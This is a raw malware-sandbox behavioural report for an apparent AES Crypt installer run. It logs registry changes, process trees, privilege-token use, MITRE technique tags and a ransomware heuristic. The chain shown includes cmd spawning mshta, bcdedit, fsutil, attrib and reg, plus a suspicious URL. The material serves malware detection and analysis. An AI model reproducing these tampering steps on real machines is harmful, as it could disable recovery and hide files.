Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\aesfile\shell\open\ = "&Open"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.aes\ = "aesfile"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\aesfile	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\aesfile\shell\open	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.aes\aesfile	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\PackageCode = "EF46C65FDB9F863459E25F06C113CF59"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\InstanceType = "0"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{BACE464C-A450-46A7-BC98-F441BCE45CE9}	MsiExec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{BACE464C-A450-46A7-BC98-F441BCE45CE9}\ = "AESCrypt"	MsiExec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{35872D53-3BD4-45FA-8DB5-FFC47D4235E7}\InprocServer32\ThreadingModel = "Apartment"	MsiExec.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\3D5882657A14112428E21B1B1500965E\DefaultFeature	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\DeploymentFlags = "3"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\Temp1_AESCrypt_v310_x64.zip\\AESCrypt_v310_x64\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1181767204-2009306918-3718769404-1000\{84120007-AAEF-4793-8BD5-2E8E8A26350B}	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Temp1_AESCrypt_v310_x64.zip\\AESCrypt_v310_x64\\"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.aes\aesfile\ShellNew	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\SourceList\PackageName = "AESCrypt.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.aes	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\SourceList\Net	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\aesfile\DefaultIcon	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\aesfile\shell\open\command\command = 55006300680063004300650054007400370039003800780045002c006200740065003700670072003e007e004700450056003d00650048007d00660045003400500059004000500077006f00440077007a002000220025003100220000000000	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\aesfile\DefaultIcon\ = "C:\\Windows\\Installer\\{562885D3-41A7-4211-822E-B1B1510069E5}\\_853F67D554F05449430E7E.exe,0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{35872D53-3BD4-45FA-8DB5-FFC47D4235E7}\ = "AESCryptShellExtCom Class"	MsiExec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{35872D53-3BD4-45FA-8DB5-FFC47D4235E7}\InprocServer32	MsiExec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\AESCrypt\ = "{35872D53-3BD4-45FA-8DB5-FFC47D4235E7}"	MsiExec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\SourceList	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\aesfile\shell	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\AESCrypt.DLL\AppID = "{BACE464C-A450-46A7-BC98-F441BCE45CE9}"	MsiExec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\Clients = 3a0000000000	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\aesfile\shell\ = "open"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\ProductIcon = "C:\\Windows\\Installer\\{562885D3-41A7-4211-822E-B1B1510069E5}\\_112D608FD02CD87FDC7735.exe"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\06E61D2961F138147AC880C670FC34A6\3D5882657A14112428E21B1B1500965E	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\aesfile\shell\open\command\ = "\"C:\\Program Files\\AESCrypt\\AESCrypt32.exe\" \"%1\""	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\3D5882657A14112428E21B1B1500965E	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\06E61D2961F138147AC880C670FC34A6	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{35872D53-3BD4-45FA-8DB5-FFC47D4235E7}\AppID = "{BACE464C-A450-46A7-BC98-F441BCE45CE9}"	MsiExec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\ProductName = "AES Crypt"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\aesfile\shell\open\command	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\AESCrypt	MsiExec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\SourceList\Media	msiexec.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

5088 reg.exe
5248 reg.exe
Opens file in notepad (likely ransom note) 5 IoCs
ransomware

Processes:

NOTEPAD.EXENOTEPAD.EXE

pid process

3532
5032
1960 NOTEPAD.EXE
1200 NOTEPAD.EXE
1892
Runs net.exe
Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

2240 PING.EXE
3812 PING.EXE
5312

pid	process
5088	reg.exe
5248	reg.exe

pid	process
3532
5032
1960	NOTEPAD.EXE
1200	NOTEPAD.EXE
1892

pid	process
2240	PING.EXE
3812	PING.EXE
5312

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msiexec.exepowershell.exepowershell.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exe

pid	process
5000	msiexec.exe
5000	msiexec.exe
2080	powershell.exe
2080	powershell.exe
2080	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
868	System.exe
868	System.exe
868	System.exe
868	System.exe
5704	System.exe
5704	System.exe
5704	System.exe
5704	System.exe
212	System.exe
212	System.exe
212	System.exe
212	System.exe
4316	System.exe
4316	System.exe
4316	System.exe
4316	System.exe
3292	System.exe
3292	System.exe
3292	System.exe
3292	System.exe
3692	System.exe
3692	System.exe
3692	System.exe
3692	System.exe
4100	System.exe
4100	System.exe
4100	System.exe
4100	System.exe
5020	System.exe
5020	System.exe
5020	System.exe
5020	System.exe
1892	System.exe
1892	System.exe
1892	System.exe
1892	System.exe
6136	System.exe
6136	System.exe
6136	System.exe
6136	System.exe
5000	System.exe
5000	System.exe
5000	System.exe
5000	System.exe
1168	System.exe
1168	System.exe
1168	System.exe
1168	System.exe
3916	System.exe
3916	System.exe
3916	System.exe
3916	System.exe
4924	System.exe
4924	System.exe
4924	System.exe
4924	System.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exe

description	pid	process
Token: SeShutdownPrivilege	5324	msiexec.exe
Token: SeIncreaseQuotaPrivilege	5324	msiexec.exe
Token: SeSecurityPrivilege	5000	msiexec.exe
Token: SeCreateTokenPrivilege	5324	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	5324	msiexec.exe
Token: SeLockMemoryPrivilege	5324	msiexec.exe
Token: SeIncreaseQuotaPrivilege	5324	msiexec.exe
Token: SeMachineAccountPrivilege	5324	msiexec.exe
Token: SeTcbPrivilege	5324	msiexec.exe
Token: SeSecurityPrivilege	5324	msiexec.exe
Token: SeTakeOwnershipPrivilege	5324	msiexec.exe
Token: SeLoadDriverPrivilege	5324	msiexec.exe
Token: SeSystemProfilePrivilege	5324	msiexec.exe
Token: SeSystemtimePrivilege	5324	msiexec.exe
Token: SeProfSingleProcessPrivilege	5324	msiexec.exe
Token: SeIncBasePriorityPrivilege	5324	msiexec.exe
Token: SeCreatePagefilePrivilege	5324	msiexec.exe
Token: SeCreatePermanentPrivilege	5324	msiexec.exe
Token: SeBackupPrivilege	5324	msiexec.exe
Token: SeRestorePrivilege	5324	msiexec.exe
Token: SeShutdownPrivilege	5324	msiexec.exe
Token: SeDebugPrivilege	5324	msiexec.exe
Token: SeAuditPrivilege	5324	msiexec.exe
Token: SeSystemEnvironmentPrivilege	5324	msiexec.exe
Token: SeChangeNotifyPrivilege	5324	msiexec.exe
Token: SeRemoteShutdownPrivilege	5324	msiexec.exe
Token: SeUndockPrivilege	5324	msiexec.exe
Token: SeSyncAgentPrivilege	5324	msiexec.exe
Token: SeEnableDelegationPrivilege	5324	msiexec.exe
Token: SeManageVolumePrivilege	5324	msiexec.exe
Token: SeImpersonatePrivilege	5324	msiexec.exe
Token: SeCreateGlobalPrivilege	5324	msiexec.exe
Token: SeCreateTokenPrivilege	5324	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	5324	msiexec.exe
Token: SeLockMemoryPrivilege	5324	msiexec.exe
Token: SeIncreaseQuotaPrivilege	5324	msiexec.exe
Token: SeMachineAccountPrivilege	5324	msiexec.exe
Token: SeTcbPrivilege	5324	msiexec.exe
Token: SeSecurityPrivilege	5324	msiexec.exe
Token: SeTakeOwnershipPrivilege	5324	msiexec.exe
Token: SeLoadDriverPrivilege	5324	msiexec.exe
Token: SeSystemProfilePrivilege	5324	msiexec.exe
Token: SeSystemtimePrivilege	5324	msiexec.exe
Token: SeProfSingleProcessPrivilege	5324	msiexec.exe
Token: SeIncBasePriorityPrivilege	5324	msiexec.exe
Token: SeCreatePagefilePrivilege	5324	msiexec.exe
Token: SeCreatePermanentPrivilege	5324	msiexec.exe
Token: SeBackupPrivilege	5324	msiexec.exe
Token: SeRestorePrivilege	5324	msiexec.exe
Token: SeShutdownPrivilege	5324	msiexec.exe
Token: SeDebugPrivilege	5324	msiexec.exe
Token: SeAuditPrivilege	5324	msiexec.exe
Token: SeSystemEnvironmentPrivilege	5324	msiexec.exe
Token: SeChangeNotifyPrivilege	5324	msiexec.exe
Token: SeRemoteShutdownPrivilege	5324	msiexec.exe
Token: SeUndockPrivilege	5324	msiexec.exe
Token: SeSyncAgentPrivilege	5324	msiexec.exe
Token: SeEnableDelegationPrivilege	5324	msiexec.exe
Token: SeManageVolumePrivilege	5324	msiexec.exe
Token: SeImpersonatePrivilege	5324	msiexec.exe
Token: SeCreateGlobalPrivilege	5324	msiexec.exe
Token: SeCreateTokenPrivilege	5324	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	5324	msiexec.exe
Token: SeLockMemoryPrivilege	5324	msiexec.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msiexec.exe

pid	process
5324	msiexec.exe
5324	msiexec.exe
5324	msiexec.exe
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

pid	process
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632
4632

Suspicious use of SetWindowsHookEx 64 IoCs

Processes:

pid	process
3116
392
5176
6116
400
1344
5172
3904
5188
5292
2108
5292
5188
3904
2108
3904
5292
5188
2108
5292
5188
3904
2108
3904
5188
5292
2108
5188
5292
3904
2108
3904
5188
5292
2108
5292
3904
5188
2108
3904
5188
5292
2108
5292
5188
3904
2108
5188
5292
3904
2108
5292
5188
3904
2108
3904
5188
5292
2108
5292
5188
3904
2108
3904

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msiexec.exesvchost.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exeWScript.execmd.exe

description	pid	process	target process
PID 5000 wrote to memory of 4948	5000	msiexec.exe	MsiExec.exe
PID 5000 wrote to memory of 4948	5000	msiexec.exe	MsiExec.exe
PID 5000 wrote to memory of 4948	5000	msiexec.exe	MsiExec.exe
PID 5000 wrote to memory of 4668	5000	msiexec.exe	srtasks.exe
PID 5000 wrote to memory of 4668	5000	msiexec.exe	srtasks.exe
PID 5000 wrote to memory of 6044	5000	msiexec.exe	MsiExec.exe
PID 5000 wrote to memory of 6044	5000	msiexec.exe	MsiExec.exe
PID 5000 wrote to memory of 6044	5000	msiexec.exe	MsiExec.exe
PID 5000 wrote to memory of 5560	5000	msiexec.exe	MsiExec.exe
PID 5000 wrote to memory of 5560	5000	msiexec.exe	MsiExec.exe
PID 1556 wrote to memory of 4572	1556	svchost.exe	dashost.exe
PID 1556 wrote to memory of 4572	1556	svchost.exe	dashost.exe
PID 3648 wrote to memory of 2924	3648	cmd.exe	mode.com
PID 3648 wrote to memory of 2924	3648	cmd.exe	mode.com
PID 3648 wrote to memory of 2928	3648	cmd.exe	cmd.exe
PID 3648 wrote to memory of 2928	3648	cmd.exe	cmd.exe
PID 2928 wrote to memory of 4196	2928	cmd.exe	mshta.exe
PID 2928 wrote to memory of 4196	2928	cmd.exe	mshta.exe
PID 3116 wrote to memory of 116	3116	cmd.exe	cmd.exe
PID 3116 wrote to memory of 116	3116	cmd.exe	cmd.exe
PID 116 wrote to memory of 4456	116	cmd.exe	cmd.exe
PID 116 wrote to memory of 4456	116	cmd.exe	cmd.exe
PID 5968 wrote to memory of 1540	5968	cmd.exe	cmd.exe
PID 5968 wrote to memory of 1540	5968	cmd.exe	cmd.exe
PID 1540 wrote to memory of 3152	1540	cmd.exe	cmd.exe
PID 1540 wrote to memory of 3152	1540	cmd.exe	cmd.exe
PID 5124 wrote to memory of 1676	5124	cmd.exe	chcp.com
PID 5124 wrote to memory of 1676	5124	cmd.exe	chcp.com
PID 5124 wrote to memory of 5588	5124	cmd.exe	fsutil.exe
PID 5124 wrote to memory of 5588	5124	cmd.exe	fsutil.exe
PID 5124 wrote to memory of 1116	5124	cmd.exe	WScript.exe
PID 5124 wrote to memory of 1116	5124	cmd.exe	WScript.exe
PID 1116 wrote to memory of 6124	1116	WScript.exe	cmd.exe
PID 1116 wrote to memory of 6124	1116	WScript.exe	cmd.exe
PID 6124 wrote to memory of 3916	6124	cmd.exe	chcp.com
PID 6124 wrote to memory of 3916	6124	cmd.exe	chcp.com
PID 6124 wrote to memory of 4460	6124	cmd.exe	fsutil.exe
PID 6124 wrote to memory of 4460	6124	cmd.exe	fsutil.exe
PID 6124 wrote to memory of 4552	6124	cmd.exe	msg.exe
PID 6124 wrote to memory of 4552	6124	cmd.exe	msg.exe
PID 6124 wrote to memory of 4520	6124	cmd.exe	cmd.exe
PID 6124 wrote to memory of 4520	6124	cmd.exe	cmd.exe
PID 6124 wrote to memory of 6100	6124	cmd.exe	attrib.exe
PID 6124 wrote to memory of 6100	6124	cmd.exe	attrib.exe
PID 6124 wrote to memory of 3888	6124	cmd.exe	bcdedit.exe
PID 6124 wrote to memory of 3888	6124	cmd.exe	bcdedit.exe
PID 6124 wrote to memory of 3260	6124	cmd.exe	bcdedit.exe
PID 6124 wrote to memory of 3260	6124	cmd.exe	bcdedit.exe
PID 6124 wrote to memory of 2284	6124	cmd.exe	reg.exe
PID 6124 wrote to memory of 2284	6124	cmd.exe	reg.exe
PID 6124 wrote to memory of 3472	6124	cmd.exe	reg.exe
PID 6124 wrote to memory of 3472	6124	cmd.exe	reg.exe
PID 6124 wrote to memory of 2080	6124	cmd.exe	reg.exe
PID 6124 wrote to memory of 2080	6124	cmd.exe	reg.exe
PID 6124 wrote to memory of 1856	6124	cmd.exe	reg.exe
PID 6124 wrote to memory of 1856	6124	cmd.exe	reg.exe
PID 6124 wrote to memory of 4744	6124	cmd.exe	reg.exe
PID 6124 wrote to memory of 4744	6124	cmd.exe	reg.exe
PID 6124 wrote to memory of 3076	6124	cmd.exe	reg.exe
PID 6124 wrote to memory of 3076	6124	cmd.exe	reg.exe
PID 6124 wrote to memory of 3584	6124	cmd.exe	reg.exe
PID 6124 wrote to memory of 3584	6124	cmd.exe	reg.exe
PID 6124 wrote to memory of 2396	6124	cmd.exe	reg.exe
PID 6124 wrote to memory of 2396	6124	cmd.exe	reg.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	process
5968	attrib.exe
6112	attrib.exe
5052
1612
628
2076
1444	attrib.exe
392
5360
5868
3708
3152
3292
628	attrib.exe
5128
5004
1940
4480
5392
4480
4520	attrib.exe
4524	attrib.exe
448	attrib.exe
1176	attrib.exe
1596
3688
5224
684
6120
4460
5976
5420
1648
4944
4956
3256
6084	attrib.exe
5676	attrib.exe
2960
5220
3548
1912
2020
4256
6124
1760
5568
4700
5976
4524
5828	attrib.exe
4524	attrib.exe
5128
1200
1292
4944
3540
4600
2800
5568	attrib.exe
4296	attrib.exe
3256
5836
6040	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://wisegex.com
1⤵
PID:860

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --field-trial-handle=4044,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=3772 /prefetch:1
1⤵
PID:4056

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --field-trial-handle=1756,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=4812 /prefetch:1
1⤵
PID:4596

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --field-trial-handle=5020,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5240 /prefetch:1
1⤵
PID:3188

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5256,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5400 /prefetch:8
1⤵
PID:2924

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5404,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5484 /prefetch:8
1⤵
PID:864

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=5024,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5956 /prefetch:1
1⤵
PID:1624

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=5116,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5936 /prefetch:1
1⤵
PID:1128

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=6076,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6124 /prefetch:1
1⤵
PID:3152

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --field-trial-handle=6276,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5444 /prefetch:1
1⤵
PID:1920

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --field-trial-handle=5936,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5420 /prefetch:1
1⤵
PID:4552

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6088,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6760 /prefetch:8
1⤵
PID:2096

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --field-trial-handle=6280,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6924 /prefetch:1
1⤵
PID:2104

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --field-trial-handle=6944,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6788 /prefetch:1
1⤵
PID:4852

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --field-trial-handle=6492,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6408 /prefetch:1
1⤵
PID:5136

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6272,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6324 /prefetch:8
1⤵
PID:5204

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --field-trial-handle=6356,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6348 /prefetch:1
1⤵
PID:5256

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6316,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=7140 /prefetch:8
1⤵
PID:5340

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6336,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6312 /prefetch:8
1⤵
- Modifies registry class
PID:5348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --field-trial-handle=6304,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=7416 /prefetch:1
1⤵
PID:5412

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
